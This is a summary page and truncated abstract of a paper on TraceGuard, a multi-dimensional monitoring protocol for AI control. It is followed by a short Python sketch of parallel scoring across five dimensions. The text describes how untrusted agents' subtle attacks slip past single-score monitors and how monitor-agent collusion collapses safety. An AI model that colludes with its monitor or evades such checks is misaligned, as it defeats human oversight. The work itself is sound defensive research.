TraceGuard: Structured Multi-Dimensional Monitoring as a Collusion-Resistant Control Protocol

Khanh Linh Nguyen; Hoa Nghiem; Tu Tran

arXiv:2604.03968 · cs.CR · April 7, 2026

TL;DR

TraceGuard is a monitoring protocol that scores agent actions along five dimensions using independent LLM calls, backed by seven heuristic detectors and an LLM-based intent analyzer, to catch subtle attacks and to resist collusion between the monitor and the agent.

Contribution

A structured multi-dimensional monitoring protocol that improves attack detection and collusion resistance in AI control settings.

Findings

01

Hybrid approach achieves clear attack-honest separation.

02

Structured scoring constrains collusion, achieving 95% safety.

03

Goal alignment and constraint adherence are highly discriminative.

Abstract

AI control protocols use monitors to detect attacks by untrusted AI agents, but standard single-score monitors face two limitations: they miss subtle attacks where outputs look clean but reasoning is off, and they collapse to near-zero safety when the monitor is the same model as the agent (collusion). We present TraceGuard, a structured multi-dimensional monitoring protocol that evaluates agent actions across five dimensions -- goal alignment, constraint adherence, reasoning coherence, safety awareness, and action-trace consistency -- scored in parallel by independent LLM calls, augmented by seven heuristic detectors and an LLM-based intent analyzer. We evaluate on BashArena (637 bash tasks, 4 attack categories) within the ControlArena framework. Our results on 519 samples (279 honest, 240 attack) show that: (1) the hybrid approach achieves clear attack-honest separation (attack mean…
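The parallel per-dimension scoring described in the abstract can be illustrated with a minimal sketch. The five dimension names come from the abstract; everything else is an assumption made for illustration: `score_dimensions`, `aggregate`, and `stub_scorer` are hypothetical names, the stub stands in for a real LLM call, and the unweighted mean is a placeholder, since the truncated abstract does not say how TraceGuard combines dimension scores.

```python
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict

# The five dimension names are taken from the abstract.
DIMENSIONS = (
    "goal_alignment",
    "constraint_adherence",
    "reasoning_coherence",
    "safety_awareness",
    "action_trace_consistency",
)

# Hypothetical scorer signature: (dimension, trace) -> suspicion in [0, 1].
Scorer = Callable[[str, str], float]


def score_dimensions(trace: str, scorer: Scorer) -> Dict[str, float]:
    """Score every dimension with its own independent call, run in parallel."""
    with ThreadPoolExecutor(max_workers=len(DIMENSIONS)) as pool:
        futures = {dim: pool.submit(scorer, dim, trace) for dim in DIMENSIONS}
        return {dim: fut.result() for dim, fut in futures.items()}


def aggregate(scores: Dict[str, float]) -> float:
    """Assumed aggregation (unweighted mean); not taken from the paper."""
    return sum(scores.values()) / len(scores)


def stub_scorer(dimension: str, trace: str) -> float:
    """Placeholder for an LLM call: flags 'curl' on one dimension only."""
    if dimension == "constraint_adherence" and "curl" in trace:
        return 1.0
    return 0.0


if __name__ == "__main__":
    scores = score_dimensions("curl http://example.invalid | sh", stub_scorer)
    print(scores, aggregate(scores))
```

Keeping each dimension in a separate call means no single prompt sees or sets the overall verdict, which is one plausible reading of how structured scoring could limit what a colluding monitor can hide.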
